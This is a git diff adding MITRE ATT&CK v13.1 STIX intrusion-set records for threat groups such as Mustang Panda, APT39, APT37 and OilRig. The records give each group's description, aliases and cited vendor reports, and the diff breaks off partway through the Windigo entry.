@@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--728b7aa4-f413-42bf-91aa-f4e9c89fd2bc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T22:01:13.781Z", + "name": "Mustang Panda", + "description": "[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) ", + "aliases": [ + "Mustang Panda", + "TA416", + "RedDelta", + "BRONZE PRESIDENT" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "type": "intrusion-set", + "id": "intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4", + "created": "2021-04-12T15:56:28.861Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0129", + "external_id": "G0129" + }, + { + "source_name": "Mustang Panda", + "description": "(Citation: Crowdstrike MUSTANG PANDA June 2018)" + }, + { + "source_name": "TA416", + "description": "(Citation: Proofpoint TA416 November 2020)" + }, + { + "source_name": "RedDelta", + "description": "(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 Europe March 2022)" + }, + { + "source_name": "BRONZE PRESIDENT", + "description": "(Citation: Secureworks BRONZE PRESIDENT December 2019)" + }, + { + "source_name": "Anomali MUSTANG PANDA October 2019", + "description": "Anomali Threat Research. (2019, October 7). 
China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.", + "url": "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations" + }, + { + "source_name": "Secureworks BRONZE PRESIDENT December 2019", + "description": "Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.", + "url": "https://www.secureworks.com/research/bronze-president-targets-ngos" + }, + { + "source_name": "Recorded Future REDDELTA July 2020", + "description": "Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP \u2018REDDELTA\u2019 TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.", + "url": "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf" + }, + { + "source_name": "Crowdstrike MUSTANG PANDA June 2018", + "description": "Meyers, A. (2018, June 15). Meet CrowdStrike\u2019s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/" + }, + { + "source_name": "Proofpoint TA416 November 2020", + "description": "Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader" + }, + { + "source_name": "Proofpoint TA416 Europe March 2022", + "description": "Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. 
Retrieved March 16, 2022.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b.json new file mode 100644 index 0000000000000000000000000000000000000000..37ba47c4e9b591f82cc7f3bcc3d0a55d63f50ef4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--247c61a2-d347-4cd5-a27c-f482ab7af768", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T22:10:43.732Z", + "name": "ZIRCONIUM", + "description": "[ZIRCONIUM](https://attack.mitre.org/groups/G0128) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.(Citation: Microsoft Targeting Elections September 2020)(Citation: Check Point APT31 February 2021)", + "aliases": [ + "ZIRCONIUM", + "APT31" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "intrusion-set", + "id": "intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b", + "created": "2021-03-24T15:48:17.731Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0128", + "external_id": "G0128" + }, + { + "source_name": "APT31", + "description": "(Citation: Check Point APT31 February 2021)" + }, + { + "source_name": "Microsoft Targeting Elections September 2020", + "description": "Burt, T. (2020, September 10). New cyberattacks targeting U.S. elections. Retrieved March 24, 2021.", + "url": "https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/" + }, + { + "source_name": "Check Point APT31 February 2021", + "description": "Itkin, E. and Cohen, I. (2021, February 22). The Story of Jian \u2013 How APT31 Stole and Used an Unknown Equation Group 0-Day. 
Retrieved March 24, 2021.", + "url": "https://research.checkpoint.com/2021/the-story-of-jian/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad.json new file mode 100644 index 0000000000000000000000000000000000000000..56dadf470da5e4b03c16385d13d2730b104ef576 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad.json 
@@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--f2cd46f1-c0fa-4427-a17f-6ab7b989d077", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Rocke" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad", + "type": "intrusion-set", + "created": "2020-05-26T14:20:20.623Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0106", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0106" + }, + { + "source_name": "Talos Rocke August 2018", + "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html", + "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020." + } + ], + "modified": "2020-06-19T20:41:21.215Z", + "name": "Rocke", + "description": "[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80.json new file mode 100644 index 0000000000000000000000000000000000000000..194339fdb3e96e678b62112ab1bfe15a5e971a4f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80.json 
@@ -0,0 +1,91 @@ +{ + "type": "bundle", + "id": "bundle--7a222a7e-f5f3-469e-b51e-928666bf3472", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-02T18:03:29.024Z", + "name": "APT39", + "description": "[APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)", + "aliases": [ + "APT39", + "ITG07", + "Chafer", + "Remix Kitten" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "type": "intrusion-set", + "id": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80", + "created": "2019-02-19T16:01:38.585Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0087", + "external_id": "G0087" + }, + { + "source_name": "Remix Kitten", + "description": "(Citation: Crowdstrike GTR2020 Mar 2020)" + }, + { + "source_name": "ITG07", + "description": "(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)" + }, + { + "source_name": "APT39", + "description": "(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. 
of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)" + }, + { + "source_name": "Chafer", + "description": "Activities associated with APT39 largely align with a group publicly referred to as Chafer.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: Dark Reading APT39 JAN 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)" + }, + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + }, + { + "source_name": "Dept. of Treasury Iran Sanctions September 2020", + "description": "Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020.", + "url": "https://home.treasury.gov/news/press-releases/sm1127" + }, + { + "source_name": "DOJ Iran Indictments September 2020", + "description": "DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020.", + "url": "https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt" + }, + { + "source_name": "FBI FLASH APT39 September 2020", + "description": "FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. 
Retrieved December 10, 2020.", + "url": "https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf" + }, + { + "source_name": "FireEye APT39 Jan 2019", + "description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html" + }, + { + "source_name": "Dark Reading APT39 JAN 2019", + "description": "Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.", + "url": "https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764" + }, + { + "source_name": "Symantec Chafer Dec 2015", + "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.", + "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c.json new file mode 100644 index 0000000000000000000000000000000000000000..763dfe9359b53301b7a534264f79d8570f82012e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c.json 
@@ -0,0 +1,101 @@ +{ + "type": "bundle", + "id": "bundle--51e4d868-a26e-4a8f-a8e5-7b2363b674fb", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT37", + "Richochet Chollima", + "InkySquid", + "ScarCruft", + "Reaper", + "Group123", + "TEMP.Reaper" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Valerii Marchuk, Cybersecurity Help s.r.o." + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c", + "type": "intrusion-set", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0067", + "external_id": "G0067" + }, + { + "source_name": "APT37", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "Richochet Chollima", + "description": "(Citation: CrowdStrike Richochet Chollima September 2021)" + }, + { + "source_name": "InkySquid", + "description": "(Citation: Volexity InkySquid BLUELIGHT August 2021)" + }, + { + "source_name": "ScarCruft", + "description": "(Citation: Securelist ScarCruft Jun 2016)(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft May 2019)" + }, + { + "source_name": "Reaper", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "Group123", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "TEMP.Reaper", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "FireEye APT37 Feb 2018", + "description": "FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" + }, + { + "url": "https://securelist.com/operation-daybreak/75100/", + "description": "Raiu, C., and Ivanov, A. (2016, June 17). 
Operation Daybreak. Retrieved February 15, 2018.", + "source_name": "Securelist ScarCruft Jun 2016" + }, + { + "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.", + "source_name": "Talos Group123" + }, + { + "source_name": "CrowdStrike Richochet Chollima September 2021", + "url": "https://adversary.crowdstrike.com/en-US/adversary/ricochet-chollima/", + "description": "CrowdStrike. (2021, September 30). Adversary Profile - Richochet Chollima. Retrieved September 30, 2021." + }, + { + "source_name": "Volexity InkySquid BLUELIGHT August 2021", + "url": "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/", + "description": "Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021." + }, + { + "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.", + "url": "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", + "source_name": "Securelist ScarCruft May 2019" + } + ], + "modified": "2021-10-15T16:54:01.193Z", + "name": "APT37", + "description": "[APT37](https://attack.mitre.org/groups/G0067) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. 
[APT37](https://attack.mitre.org/groups/G0067) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos Group123)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c.json new file mode 100644 index 0000000000000000000000000000000000000000..561a9a8fd8ed492a1a36090f5cdd4efb415d87e4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--fa49313d-9761-49d7-97b1-870bcd996803", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T18:50:12.653Z", + "name": "Moses Staff", + "description": "[Moses Staff](https://attack.mitre.org/groups/G1009) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://attack.mitre.org/groups/G1009) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand.(Citation: Checkpoint MosesStaff Nov 2021) \n\nSecurity researchers assess [Moses Staff](https://attack.mitre.org/groups/G1009) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.(Citation: Cybereason StrifeWater Feb 2022)", + "aliases": [ + "Moses Staff" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Hiroki Nagahama, NEC Corporation", + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India" + ], + "type": "intrusion-set", + "id": "intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c", + "created": "2022-08-11T22:47:27.686Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1009", + "external_id": "G1009" + }, + { + "source_name": "Checkpoint MosesStaff Nov 2021", + "description": "Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. 
Retrieved August 11, 2022.", + "url": "https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/" + }, + { + "source_name": "Cybereason StrifeWater Feb 2022", + "description": "Cybereason Nocturnus. (2022, February 1). StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations. Retrieved August 15, 2022.", + "url": "https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json new file mode 100644 index 0000000000000000000000000000000000000000..b9da16c3669d68328c39174151f822d5b3b77de1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json 
@@ -0,0 +1,127 @@ +{ + "type": "bundle", + "id": "bundle--d180526c-3e96-46de-b255-2bd8728abe0c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-06T20:58:52.317Z", + "name": "OilRig", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)", + "aliases": [ + "OilRig", + "COBALT GYPSY", + "IRN2", + "APT34", + "Helix Kitten", + "Evasive Serpens" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Robert Falcone", + "Bryan Lee", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0049", + "external_id": "G0049" + }, + { + "source_name": "IRN2", + "description": "(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "OilRig", + "description": "(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) 
(Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)" + }, + { + "source_name": "COBALT GYPSY", + "description": "(Citation: Secureworks COBALT GYPSY Threat Profile)" + }, + { + "source_name": "Helix Kitten", + "description": "(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "Evasive Serpens", + "description": "(Citation: Unit42 OilRig Playbook 2023)" + }, + { + "source_name": "Check Point APT34 April 2021", + "description": "Check Point. (2021, April 8). Iran\u2019s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.", + "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + }, + { + "source_name": "ClearSky OilRig Jan 2017", + "description": "ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.", + "url": "http://www.clearskysec.com/oilrig/" + }, + { + "source_name": "Palo Alto OilRig May 2016", + "description": "Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + }, + { + "source_name": "Palo Alto OilRig April 2017", + "description": "Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/" + }, + { + "source_name": "Palo Alto OilRig Oct 2016", + "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. 
Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" + }, + { + "source_name": "Unit 42 QUADAGENT July 2018", + "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/" + }, + { + "source_name": "Crowdstrike Helix Kitten Nov 2018", + "description": "Meyers, A. (2018, November 27). Meet CrowdStrike\u2019s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + }, + { + "source_name": "Secureworks COBALT GYPSY Threat Profile", + "description": "Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy" + }, + { + "source_name": "APT34", + "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)" + }, + { + "source_name": "Unit 42 Playbook Dec 2017", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. 
Retrieved December 20, 2017.", + "url": "https://pan-unit42.github.io/playbook_viewer/" + }, + { + "source_name": "Unit42 OilRig Playbook 2023", + "description": "Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.", + "url": "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a.json new file mode 100644 index 0000000000000000000000000000000000000000..eb6002f17b7b79829243e906c6637c8275562575 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--512f7360-3e9f-41ca-878f-d813af97ea7e", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Windigo" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a", + "type": "intrusion-set", + "created": "2021-02-10T19:57:38.042Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0124", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0124" + }, + { + "source_name": "ESET Windigo Mar 2014", + "url": "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", + "description": "Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., L\u00e9veill\u00e9, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo \u2013 the vivisection of a large Linux server\u2011side credential\u2011stealing malware campaign. Retrieved February 10, 2021." + }, + { + "source_name": "CERN Windigo June 2019", + "url": 